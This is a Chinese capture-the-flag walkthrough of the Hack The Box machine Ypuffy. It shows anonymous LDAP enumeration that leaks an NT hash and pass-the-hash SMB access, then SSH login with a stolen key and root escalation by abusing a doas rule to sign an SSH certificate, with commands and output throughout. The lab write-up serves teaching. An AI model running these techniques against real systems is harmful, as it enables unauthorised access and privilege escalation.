大方子
大方子

【HTB系列】靶机Ypuffy的渗透测试详解

 

【HTB系列】靶机Ypuffy的渗透测试详解_第1张图片

====================================================================

 

信息收集

我们用nmap对靶机进行信息收集

nmap -sV -sT -sC -T5 10.10.10.107
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 17:25 CST
Warning: 10.10.10.107 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.107
Host is up (0.29s latency).
Not shown: 940 closed ports, 55 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 (RSA)
|   256 dd:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 (ECDSA)
|_  256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 (ED25519)
80/tcp  open  http        OpenBSD httpd
| fingerprint-strings: 
|   DNSVersionBindReqTCP, RPCCheck: 
|     HTTP/1.0 400 Bad Request
|     Date: Wed, 13 Feb 2019 09:26:59 GMT
|     Server: OpenBSD httpd
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 431
|     
|     
|     
|     
|     400 Bad Request
|     
|     
|     
|     
400 Bad Request

|     

|     
OpenBSD httpd

|     
|     
|   GenericLines: 
|     HTTP/1.0 400 Bad Request
|     Date: Wed, 13 Feb 2019 09:26:55 GMT
|     Server: OpenBSD httpd
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 431
|     
|     
|     
|     
|     400 Bad Request
|     
|     
|     
|     
400 Bad Request

|     

|     
OpenBSD httpd

|     
|_    
|_http-server-header: OpenBSD httpd
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open  ldap        (Anonymous bind OK)
445/tcp open  netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)

通过报告我们知道

在端口22上运行ssh,在端口80上运行http,在端口139和445上运行smb,在端口389上运行ldap。

我们先看看80端口

【HTB系列】靶机Ypuffy的渗透测试详解_第2张图片

好像出现了问题,那我们再看看SMB服务

看能不能进行匿名身份进行资源枚举

smbmap -H 10.10.10.107

提示认证失败

 

我们在换LDAP试试看,在namp的报告中提示,LDAP允许匿名访问

我们用ldapsearch工具老进行扫描

ldapsearch -h 10.10.10.107 -p 389 -x -b dc=hackthebox,dc=htb

-h:IP地址

-p:监听端口

-x:简单认证

-b:搜索的入口

 

# extended LDIF
#
# LDAPv3
# base with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# hackthebox.htb
dn: dc=hackthebox,dc=htb
dc: hackthebox
objectClass: top
objectClass: domain

# passwd, hackthebox.htb
dn: ou=passwd,dc=hackthebox,dc=htb
ou: passwd
objectClass: top
objectClass: organizationalUnit

# bob8791, passwd, hackthebox.htb
dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
uid: bob8791
cn: Bob
objectClass: account
objectClass: posixAccount
objectClass: top
userPassword:: e0JTREFVVEh9Ym9iODc5MQ==
uidNumber: 5001
gidNumber: 5001
gecos: Bob
homeDirectory: /home/bob8791
loginShell: /bin/ksh

# alice1978, passwd, hackthebox.htb
dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
uid: alice1978
cn: Alice
objectClass: account
objectClass: posixAccount
objectClass: top
objectClass: sambaSamAccount
userPassword:: e0JTREFVVEh9YWxpY2UxOTc4
uidNumber: 5000
gidNumber: 5000
gecos: Alice
homeDirectory: /home/alice1978
loginShell: /bin/ksh
sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
displayName: Alice
sambaAcctFlags: [U          ]
sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
sambaPwdLastSet: 1532916644

# group, hackthebox.htb
dn: ou=group,dc=hackthebox,dc=htb
ou: group
objectClass: top
objectClass: organizationalUnit

# bob8791, group, hackthebox.htb
dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: bob8791
userPassword:: e2NyeXB0fSo=
gidNumber: 5001

# alice1978, group, hackthebox.htb
dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: alice1978
userPassword:: e2NyeXB0fSo=
gidNumber: 5000

# ypuffy, hackthebox.htb
dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
sambaDomainName: YPUFFY
sambaSID: S-1-5-21-3933741069-3307154301-3557023464
sambaAlgorithmicRidBase: 1000
objectclass: sambaDomain
sambaNextUserRid: 1000
sambaMinPwdLength: 5
sambaPwdHistoryLength: 0
sambaLogonToChgPwd: 0
sambaMaxPwdAge: -1
sambaMinPwdAge: 0
sambaLockoutDuration: 30
sambaLockoutObservationWindow: 30
sambaLockoutThreshold: 0
sambaForceLogoff: -1
sambaRefuseMachinePwdChange: 0
sambaNextRid: 1001

# search result
search: 2
result: 0 Success

# numResponses: 9
# numEntries: 8
 

我们也可以使用nmap来枚举ldap,并调用一个脚本 ldap-search

nmap -p 389 --script ldap-search 10.10.10.107


PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search: 
|   Context: dc=hackthebox,dc=htb
|     dn: dc=hackthebox,dc=htb
|         dc: hackthebox
|         objectClass: top
|         objectClass: domain
|     dn: ou=passwd,dc=hackthebox,dc=htb
|         ou: passwd
|         objectClass: top
|         objectClass: organizationalUnit
|     dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
|         uid: bob8791
|         cn: Bob
|         objectClass: account
|         objectClass: posixAccount
|         objectClass: top
|         userPassword: {BSDAUTH}bob8791
|         uidNumber: 5001
|         gidNumber: 5001
|         gecos: Bob
|         homeDirectory: /home/bob8791
|         loginShell: /bin/ksh
|     dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
|         uid: alice1978
|         cn: Alice
|         objectClass: account
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: sambaSamAccount
|         userPassword: {BSDAUTH}alice1978
|         uidNumber: 5000
|         gidNumber: 5000
|         gecos: Alice
|         homeDirectory: /home/alice1978
|         loginShell: /bin/ksh
|         sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
|         displayName: Alice
|         sambaAcctFlags: [U          ]
|         sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
|         sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
|         sambaPwdLastSet: 1532916644
|     dn: ou=group,dc=hackthebox,dc=htb
|         ou: group
|         objectClass: top
|         objectClass: organizationalUnit
|     dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: bob8791
|         userPassword: {crypt}*
|         gidNumber: 5001
|     dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: alice1978
|         userPassword: {crypt}*
|         gidNumber: 5000
|     dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
|         sambaDomainName: YPUFFY
|         sambaSID: S-1-5-21-3933741069-3307154301-3557023464
|         sambaAlgorithmicRidBase: 1000
|         objectclass: sambaDomain
|         sambaNextUserRid: 1000
|         sambaMinPwdLength: 5
|         sambaPwdHistoryLength: 0
|         sambaLogonToChgPwd: 0
|         sambaMaxPwdAge: -1
|         sambaMinPwdAge: 0
|         sambaLockoutDuration: 30
|         sambaLockoutObservationWindow: 30
|         sambaLockoutThreshold: 0
|         sambaForceLogoff: -1
|         sambaRefuseMachinePwdChange: 0
|_        sambaNextRid: 1001

Nmap done: 1 IP address (1 host up) scanned in 6.60 seconds
 

【HTB系列】靶机Ypuffy的渗透测试详解_第3张图片

我们得到一个用户名alice1978和一个smb NT哈希 0B186E661BBDBDCF6047784DE8B9FD8B

此哈希是不可破解的,但我们仍然可以使用它来进行身份验证。

 

然后我们用我们得到的账号和密码进行SMB枚举

这里我们用crackmapexec

crackmapexec 10.10.10.107  -u alice1978 -H 0B186E661BBDBDCF6047784DE8B9FD8B --shares

这里有2个共享一个是alice 可读可写 另一个IPC$不允许访问

 

我们也可以用smbclient来枚举

smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //10.10.10.107/

 

然后我们连接下alic

smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //10.10.10.107/alice

只有一个文件叫my_private_key.ppk

get my_private_key.ppk下载它

 

ppk是putty远程登陆使用的文件后缀,我们需要进行转换

 

my_private_key.ppk 是一个putty私钥,我们需要将其转换为ssh私钥,以便能够与它进行ssh。

在kali,我们按照putty-tools

apt-get install putty-tools

然后我们将使用puttygen:

puttygen my_private_key.ppk -O private-openssh -o alice.key

【HTB系列】靶机Ypuffy的渗透测试详解_第4张图片

然后

chmod 600 alice.key

最好进行连接 

ssh -i alice.key [email protected]

【HTB系列】靶机Ypuffy的渗透测试详解_第5张图片

【HTB系列】靶机Ypuffy的渗透测试详解_第6张图片

 

还记得http被重置吗,我们查看下/etc/httpd.conf

【HTB系列】靶机Ypuffy的渗透测试详解_第7张图片

 

location "/userca*"

location "/sshauth*"

进行2次重定向

 

同时发现 

另外的2个用户

在bob8971的家目录中存在一个sql文件

【HTB系列】靶机Ypuffy的渗透测试详解_第8张图片

【HTB系列】靶机Ypuffy的渗透测试详解_第9张图片

它创建一个名为的表principals和另一个名为的表keys

 

我们在检查下/etc/ssh/目录下的sshd_config文件

 

#       $OpenBSD: sshd_config,v 1.102 2018/02/16 02:32:40 djm Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile      .ssh/authorized_keys

#AuthorizedPrincipalsFile none

AuthorizedKeysCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=keys&username=%u
AuthorizedKeysCommandUser nobody

TrustedUserCAKeys /home/userca/ca.pub
AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
AuthorizedPrincipalsCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication no
#PermitEmptyPasswords no

# Change to no to disable s/key passwords
ChallengeResponseAuthentication no

AllowAgentForwarding no
AllowTcpForwarding no
#GatewayPorts no
X11Forwarding no
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# override default of no subsystems
Subsystem       sftp    /usr/libexec/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding no
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server
 

【HTB系列】靶机Ypuffy的渗透测试详解_第10张图片

 

所以http服务负责一些ssh身份验证的东西,

我们用curl 请求下第一个 

curl 'http://127.0.0.1/sshauth?type=keys&username=root'

没有任何返回 

再试试第二个

curl 'http://127.0.0.1/sshauth?type=principals&username=root'

请求root的密钥给我们没有响应,但是请求我们得到的主体3m3rgencyB4ckd00r

 

生成和签署ssh密钥,获取root权限

所以现在我们有了root的主体3m3rgencyB4ckd00r。从理论上讲,我们可以生成ssh密钥并使用root的主体对它们进行签名,我们将能够以root身份与它们进行ssh。

问题是,因为alice1978我们没有被授权这样做。

在Linux上,我们可以检查是否可以运行提升的命令,sudo -l

但是这里没有

 

我们检查下doas

doas是BSD系列系统下的权限管理工具,类似于Debian系列下的sudo命令

 

这里我们看到alice1978可以 不需要密码作为用户userca执行/usr/bin/ssh-keygen

第一步是为其创建ssh密钥 

ssh-keygen -t rsa -f /tmp/id_rsa

【HTB系列】靶机Ypuffy的渗透测试详解_第11张图片

然后我们需要证书(ca),我们到 /home/userca/

并签署我们刚刚创建的ssh密钥

-s证书

-I身份

-n主体

最后我们将以root身份ssh:

ssh -i /tmp/id_rsa root@localhost

【HTB系列】靶机Ypuffy的渗透测试详解_第12张图片

你可能感兴趣的:(CTF以及各类靶机,HTB靶场题解集合)

  • 机器学习之向量化 珠峰日记 AI理论与实践机器学习人工智能
    文章目录向量化是什么为什么要向量化提升计算效率简化代码与增强可读性适配模型需求怎么做向量化数据预处理特征提取特征选择向量构建机器学习与深度学习中向量化的区别数据特征提取方式机器学习深度学习模型结构与复杂度机器学习深度学习计算资源需求机器学习深度学习数据规模适应性机器学习深度学习向量化是什么向量化是把数据转化为向量形式进行表示与处理的过程。在机器学习与深度学习的范畴内,现实中的各类数据,像文本、图像
  • CPU多级缓存 MESI-CPU缓存一致性协议 以及 乱序执行优化 H_Ystar Java并发基础
    一、CPU的多级缓存1.为什么需要CPU缓存在一个典型的系统中,可能会有几个缓存共享主存,每个相应的CPU会发出读写请求,CPU的频率太快了,快的主存跟不上,这样主存常常需要等待主存,而缓存的目的是为了减少CPU读写共享主存的次数,解决CPU和主存速度不匹配的问题。2.CPU缓存有什么意义时间局部性:如果某个数据被访问,那么不久的将来它有可能会再次被访问。空间局部性:如果某个数据被访问,那么与它相
  • 自动驾驶中控制模块状态机的作用与设计方法 程序员龙一 自动驾驶自动驾驶状态机control
    问题解答:一、车辆状态机在自动驾驶控制模块中的核心作用在自动驾驶系统中,状态机(StateMachine)是控制模块的核心逻辑框架,用于管理车辆在不同运行阶段的行为和状态切换。其核心优势体现在以下几个方面:1.系统行为的模块化与可维护性模块化分层管理:状态机将复杂的车辆行为(如启动、停车、紧急避障、车道保持等)分解为独立的状态模块。每个状态专注于单一功能(例如“车道保持”状态仅处理横向控制),降低
  • 基于STM32蓝牙智能温控风扇系统设计与实现(代码+原理图+PCB+蓝牙APP) 科创工作室li 毕业设计1stm32智能家居嵌入式硬件单片机物联网
    STM32蓝牙智能温控风扇系统设计与实现资料齐全:源代码,原理图,PCB和机智云相关教程,参考lun文等!摘要:本文设计并实现了一种基于STM32F103C8T6单片机的蓝牙智能温控风扇系统。该系统具备OLED显示、自动/手动模式切换、温湿度检测、风扇档位调节、人体红外检测、倒计时以及蓝牙APP远程控制等功能。通过集成多种传感器和执行器,系统能够根据当前温湿度变化自动控制风扇转动,同时支持手机AP
  • [HelloCTF]PHPinclude-labs超详细WP-Level 2-data协议 Haicaji WPphp网络安全web安全
    源码分析重点关注这两行代码echoinclude("data://text/plain;base64,4pedKCrigbDilr/igbAqKeKXnEhlbGxvLUNURnd3");isset($_GET['wrappers'])?include("data://text/plain".$_GET['wrappers']):'';发现这里出现了data协议data://-数据流(RFC239
  • 西交建筑学本科秋天毕业想转码,自学了Python+408,华为OD社招还是考研更香? 程序员yt python华为od考研
    今天给大家分享的是一位粉丝的提问,西交建筑学本科秋天毕业想转码,自学了Python+408,华为OD社招还是考研更香?接下来把粉丝的具体提问和我的回复分享给大家,希望也能给一些类似情况的小伙伴一些启发和帮助。同学提问:本科就读于西安交通大学建筑学,今年21岁,秋天毕业,不想在建筑行业,想转码,现在在学Python以及计算机408课程,在Boss上投了很多的岗位好像都是华为OD社招,我毕业应该去试试
  • 关于修改 Ollama 及其模型默认路径、迁移已安装的 Ollama 程序和模型以及重启 Ollama 的操作指南 星沉大海@T OllamaOllama迁移指南
    以下是关于修改Ollama及其模型默认路径、迁移已安装的Ollama程序和模型以及重启Ollama的操作指南,以问答格式呈现,并将涉及命令操作的部分使用代码块按执行顺序和步骤形式展示:Q1:如何修改Ollama及其模型的默认路径?A1:Windows系统:创建新目录:在非C盘的磁盘中创建一个新目录,用于存放Ollama的模型文件,例如D:\AIModels。设置环境变量:右键点击“此电脑”或“计算
  • JavaScript 性能优化实战:数据结构选择对性能的影响 deying0865423 开发语言javascript
    目录数组(Array)特点与适用场景性能短板链表(LinkedList)特点与适用场景性能短板集合(Set)特点与适用场景性能短板映射(Map)特点与适用场景性能短板栈(Stack)与队列(Queue)特点与适用场景性能短板在JavaScript开发中,数据结构的选择如同搭建房屋时选择合适的建筑材料,对程序性能起着决定性作用。合理的数据结构能显著提升代码执行效率,减少资源消耗,反之则可能导致性能瓶
  • JavaScript基础-DOM 简介 難釋懷 javascript开发语言
    在现代Web开发中,JavaScript与HTML和CSS一起构成了网页的核心技术。而在这三者之中,DOM(DocumentObjectModel,文档对象模型)作为浏览器处理网页内容的一种接口,扮演着至关重要的角色。通过DOM,JavaScript能够动态地访问和操作网页的内容、结构以及样式。本文将介绍DOM的基本概念、核心组成部分以及如何使用JavaScript来操作DOM。一、什么是DOM?
  • JAVA中List数组与泛型 Yeauty java泛型
    去除ArrayList中重复字符串元素方式A:案例演示需求:ArrayList去除集合中字符串的重复值(字符串的内容相同)思路:创建新集合方式/***A:案例演示*需求:ArrayList去除集合中字符串的重复值(字符串的内容相同)*思路:创建新集合方式*/publicstaticvoidmain(String[]args){ArrayListlist=newArrayList();list.ad
  • 《基于机器学习的负荷曲线聚类算法对比与改进:K-L-isodata的创新性研究》 TWHiwhjig 机器学习算法聚类
    基于机器学习的负荷曲线聚类包括kmeansisodata和改进的L-isodata以及在其基础上再次进行改进的K-L-isodata(有创新性),四者通过评价指标进行了对比精品代码可修改性极高有参考文献ID:93150688324967700自律的电气人基于机器学习的负荷曲线聚类是一种基于数据分析和模式识别的技术,它可以帮助我们对系统的负荷变化进行分类和理解。在负荷曲线聚类的研究中,K-means
  • 第十六届蓝桥杯模拟赛(第一期)-c++/c shix . 算法竞赛c++蓝桥杯c语言
    c++/c蓝桥杯模拟赛题解,非常详细质因数1、填空题【问题描述】如果一个数p是个质数,同时又是整数a的约数,则p称为a的一个质因数。请问2024有多少个质因数。【答案提交】这是一道结果填空的题,你只需要算出结果后提交即可。本题的结果为一个整数,在提交答案时只填写这个整数,填写多余的内容将无法得分.写一个判断质数和约数的函数判断即可约数判断可以直接使用c++的__gcd(最大公因数)函数,当然也可以
  • java的WeakHashMap可以用来做缓存使用?强软弱虚四种引用对比 爱的叹息 Java基础整理java缓存jvm
    在Java中,引用(Reference)机制用于管理对象的生命周期和垃圾回收。Java提供了四种类型的引用:强引用(StrongReference)、软引用(SoftReference)、弱引用(WeakReference)和虚引用(PhantomReference)。WeakHashMap使用弱引用来存储键,从而在键不再被强引用引用时自动移除对应的条目。下面是WeakHashMap的使用方法以及
  • Browser Use开启AI辅助网页操作新时代 CodeJourney. python人工智能算法数据库
    在当今数字化时代,人们的工作和生活与互联网紧密相连。每天,我们都要花费大量时间在各类网站之间穿梭,进行诸如填写表单、查询信息、比价等重复性操作。这些工作不仅耗费精力,还容易因疲劳而出错,严重影响了工作效率。而现有的自动化工具,要么需要掌握专业的编程知识才能使用,要么在功能上存在局限性,让普通技术用户望而却步。不过,随着人工智能技术的飞速发展,一款名为BrowserUse的开源项目应运而生,为我们带
  • Python XML 解析 lsx202406 开发语言
    PythonXML解析引言XML(可扩展标记语言)是一种用于存储和传输数据的标记语言。Python作为一种功能强大的编程语言,提供了多种解析XML的方法。本文将详细介绍Python中常用的XML解析方法,包括XML解析的基本概念、常用库以及解析实例。XML解析的基本概念1.XML文档结构XML文档由以下几部分组成:声明:声明XML版本和编码方式。根元素:文档中所有元素的父元素。元素:XML文档中的
  • Shell变量详解 ivwdcwso 操作系统与云原生Shelllinux脚本
    Shell变量是Shell脚本编程中非常重要的一个概念。合理使用变量可以让脚本更加灵活和易于维护。本文将详细介绍Shell变量的定义、使用、作用域以及一些高级用法。1.变量的定义和赋值在Shell中定义变量非常简单,格式为:variable_name=value注意等号两边不能有空格。例如:name="John"age=30Shell变量名可以由字母、数字和下划线组成,但不能以数字开头。2.使用变
  • MySQL 5.7 vs MySQL 8.0 高频面试题解析 dblens 数据库管理和开发工具 mysql数据库
    一、基础概念与核心差异1.默认字符集的变化问:MySQL5.7和8.0的默认字符集有何不同?为什么要修改?答:MySQL5.7默认字符集为latin1,可能导致中文乱码。MySQL8.0默认改为utf8mb4(支持4字节编码,如表情符号),且默认排序规则为utf8mb4_0900_ai_ci。意义:彻底解决字符编码问题,兼容国际化需求。2.用户认证方式的演进问:从5.7到8.0,用户密码认证方式有
  • SQL语言的编译原理 慕瑶琴 包罗万象golang开发语言后端
    SQL语言的编译原理引言SQL(StructuredQueryLanguage,结构化查询语言)是用于管理和操作关系数据库的一种标准语言。作为一种高级语言,SQL不仅易于使用,而且功能强大。然而,SQL语言本身并不能直接被计算机理解。为了让计算机能够执行SQL语句,我们需要通过编译原理将SQL语句转换为机器能够理解的指令。本文将探讨SQL语言的编译原理,介绍SQL的组成部分、编译过程以及相关的优化
  • 思维链在可控核聚变等离子体控制中的应用:AI驱动的能源革命 AI大模型应用之禅 DeepSeek人工智能能源ai
    概述《思维链在可控核聚变等离子体控制中的应用:AI驱动的能源革命》旨在探讨AI技术在可控核聚变等离子体控制中的实际应用,以及如何通过思维链实现能源革命。本文将从以下几个方面展开讨论:核聚变等离子体控制背景、思维链技术介绍、AI在等离子体控制中的应用、算法原理与实现、系统设计与实现、项目实战以及最佳实践与展望。一、核聚变等离子体控制背景核聚变是一种通过将轻原子核在高温高压下聚合成更重的原子核,释放出
  • AI 创业团队:技术人才与商业人才的完美搭配 yaxin0765 人工智能
    目录一、技术人才的核心价值二、商业人才的关键作用三、实现完美搭配的策略在AI创业的赛道上,一个优秀的团队是决定企业成败的关键因素。而在这个团队中,技术人才与商业人才的完美搭配,如同鸟之双翼、车之两轮,缺一不可。他们各自发挥独特优势,相互协作,共同推动AI创业企业驶向成功的彼岸。一、技术人才的核心价值奠定技术根基:技术人才是AI创业企业的技术基石。他们精通各类AI算法、编程语言和开发框架,能够搭建起
  • 设计模式之外观模式:原理、实现与应用 wenbin_java 设计模式外观模式
    引言外观模式(FacadePattern)是一种结构型设计模式,它通过提供一个统一的接口来简化复杂系统的使用。外观模式隐藏了系统的复杂性,使得客户端可以通过一个简单的接口与系统交互。本文将深入探讨外观模式的原理、实现方式以及实际应用场景,帮助你更好地理解和使用这一设计模式。1.外观模式的核心概念1.1什么是外观模式?外观模式是一种结构型设计模式,它通过提供一个统一的接口来简化复杂系统的使用。外观模
  • 【同等学力】04-排列组合 源图客 【同等学力】数学真题数学
    1、一个饭店提供3种不同的甜点,假设期顾客小王进饭店时,每种甜点足够多,则小王选4个甜点的方式有2、设集合A={1,2,3,4},则集合A上有15种等价关系。解析:使用第二类Stirling求其不同的划分个数:S(4,1)+S(4,2)+S(4,3)+S(4,4)根据公式:S(n,1)=1,计算Stirling数的值:S(4,1)=1S(4,1)=1根据公式:S(n,2)=2m-1-1,计算Sti
  • 网络高手,早就把ping命令玩得很6了! 大侠之运维 网络
    网络高手,早就把ping命令玩得很6了!当谈到网络故障排除工具时,Ping(PacketInternetGroper)是其中最常用和最基本的之一。它是一个用于测试网络连接的命令行工具,可以帮助确定计算机是否能够与另一个计算机或网络设备进行通信。本文将深入介绍Ping命令,包括其基本用法、高级选项以及如何解释Ping的结果。第一部分:Ping命令的基本用法什么是Ping命令?Ping命令是一个网络工
  • 外贸 B2B 平台没落?多语言批发系统正在崛起 多语言电商系统 多语言电商系统外贸电商多语言订货系统多语言电商系统多语言订货系统跨境电商外贸订货系统
    近年来,全球外贸行业正在发生快速变化,传统的B2B平台正面临越来越多的挑战,尤其是在面对新兴的多语言批发系统时。这种变化不仅影响了供应商和买家之间的交易方式,也正在推动外贸行业的数字化升级和转型。今天,让我们一起探讨外贸B2B平台的逐渐没落以及多语言批发系统的崛起。外贸B2B平台的困境外贸B2B平台,如阿里巴巴国际站、环球资源等,曾经是许多企业获取海外客户的主要途径。通过这些平台,商家可以轻松地找
  • Spring Boot自动装配原理 咸阳彭于晏 SpringBootspringbootjavaspring后端
    SpringBoot自动装配原理一、什么是自动装配?自动装配通过分析类路径下的依赖、Bean的定义以及其他配置信息,自动配置Spring应用程序的配置类和Bean,以减少开发人员的配置工作,提高开发效率。    SpringBoot的自动装配实际上是从META-INF/spring.factories文件中获取到对应的需要进行自动装配的类,并生成相应的Bean对象,然后将它们交给Spring容器进
  • 【C++动态库】DLL动态库加载失败导致程序启动报错以及DLL库加载失败的常见原因分析与总结 dvlinker C/C++实战专栏C/C++软件开发从入门到实战dll动态库隐式加载动态加载加载失败LoadLibraryEx动态库找不到接口找不到
    目录1、问题说明2、dll库的隐式加载与动态加载2.1、dll库的隐式加载2.2、dll库的显式加载3、使用ProcessExplorer查看进程加载的dll库信息以及动态加载的dll库有没有加载成功3.1、使用ProcessExplorer查看进程加载的dll库信息3.2、使用ProcessExplorer查看动态启动的库有没有加载成功4、dll库加载失败原因详细分析与说明4.1、dll位数与依
  • Axios和ajax的异同点详解以及在express后端使用redirect重定向对ajax无效的原因! char56789 javascriptnode.jsreactjs
    问题描述:在express中使用redirect进行重定向时,页面显示是301状态码,页面不跳转!(说明在express中不能使用redirect进行重定向)究其原因:使用ajax后,后端无法直接让前端进行页面跳转。需要前端进行状态码和后端返回的数据的判断,然后前端自己进行跳转页面。因为ajax(axios只是对ajax进行了封装,ajax在此处的特性对axios也适用)是一个完整的请求和回掉的过
  • 代码随想录第五十五天| 并查集理论基础 寻找存在的路径 kill bert 代码随想录算法训练营算法数据结构
    并查集理论基础背景并查集是一种数据结构,主要用于解决元素的连通性问题。简单来说,当我们需要判断多个元素是否属于同一个集合时,并查集可以高效地完成这一任务。它支持两种基本操作:将两个元素合并到同一个集合中,以及判断两个元素是否属于同一个集合。原理讲解并查集的核心思想是通过一个数组来记录每个元素的父节点,从而形成一种树形结构。每个集合用一棵树来表示,树的根节点即为该集合的代表元素。具体来说:初始化:每
  • 代码随想录第五十三天| 102.沉没孤岛 105.有向图的完全可达性 106.岛屿的周长 kill bert 代码随想录算法训练营java算法数据结构
    字符串转换序列题目描述给定一个字符串beginStr和一个字符串endStr,以及一个字典strList。找到从beginStr到endStr的最短转换序列中的字符串数目。转换规则如下:序列中第一个字符串是beginStr。序列中最后一个字符串是endStr。每次转换只能改变一个字符。转换过程中的中间字符串必须是字典strList中的字符串,且每个字符串只能使用一次。如果不存在这样的转换序列,返回
  • 分析Windows操作系统的容量为什么会越来越大? 网硕互联的小客服 服务器运维网络windows
    Windows操作系统容量逐渐增大的原因是多方面的,反映了技术进步、用户需求变化以及微软在功能、兼容性、安全性等方面的权衡。以下是关键因素的分析:1.功能扩展与复杂度提升新功能集成:每代Windows都会引入新功能(如Cortana、虚拟桌面、WSL、DirectStorage等),这些功能需要额外的代码库、图形界面和支持文件。多场景支持:Windows需兼顾个人电脑、工作站、游戏设备、企业服务器
  • java Illegal overloaded getter method with ambiguous type for propert的解决 zwllxs javajdk
    好久不来iteye,今天又来看看,哈哈,今天碰到在编码时,反射中会抛出 Illegal overloaded getter method with ambiguous type for propert这么个东东,从字面意思看,是反射在获取getter时迷惑了,然后回想起java在boolean值在生成getter时,分别有is和getter,也许我们的反射对象中就有is开头的方法迷惑了jdk,
  • IT人应当知道的10个行业小内幕 beijingjava 工作互联网
    10. 虽然IT业的薪酬比其他很多行业要好,但有公司因此视你为其“佣人”。   尽管IT人士的薪水没有互联网泡沫之前要好,但和其他行业人士比较,IT人的薪资还算好点。在接下的几十年中,科技在商业和社会发展中所占分量会一直增加,所以我们完全有理由相信,IT专业人才的需求量也不会减少。   然而,正因为IT人士的薪水普遍较高,所以有些公司认为给了你这么多钱,就把你看成是公司的“佣人”,拥有你的支配
  • java 实现自定义链表 CrazyMizzz java数据结构
    1.链表结构   链表是链式的结构 2.链表的组成    链表是由头节点,中间节点和尾节点组成    节点是由两个部分组成:       1.数据域       2.引用域 3.链表的实现 &nbs
  • web项目发布到服务器后图片过一会儿消失 麦田的设计者 struts2上传图片永久保存
      作为一名学习了android和j2ee的程序员,我们必须要意识到,客服端和服务器端的交互是很有必要的,比如你用eclipse写了一个web工程,并且发布到了服务器(tomcat)上,这时你在webapps目录下看到了你发布的web工程,你可以打开电脑的浏览器输入http://localhost:8080/工程/路径访问里面的资源。但是,有时你会突然的发现之前用struts2上传的图片
  • CodeIgniter框架Cart类 name 不能设置中文的解决方法 IT独行者 CodeIgniterCart框架 
    今天试用了一下CodeIgniter的Cart类时遇到了个小问题,发现当name的值为中文时,就写入不了session。在这里特别提醒一下。 在CI手册里也有说明,如下: $data = array( 'id' => 'sku_123ABC', 'qty' => 1, '
  • linux回收站 _wy_ linux回收站
    今天一不小心在ubuntu下把一个文件移动到了回收站,我并不想删,手误了。我急忙到Nautilus下的回收站中准备恢复它,但是里面居然什么都没有。     后来我发现这是由于我删文件的地方不在HOME所在的分区,而是在另一个独立的Linux分区下,这是我专门用于开发的分区。而我删除的东东在分区根目录下的.Trash-1000/file目录下,相关的删除信息(删除时间和文件所在
  • jquery回到页面顶端 知了ing htmljquerycss
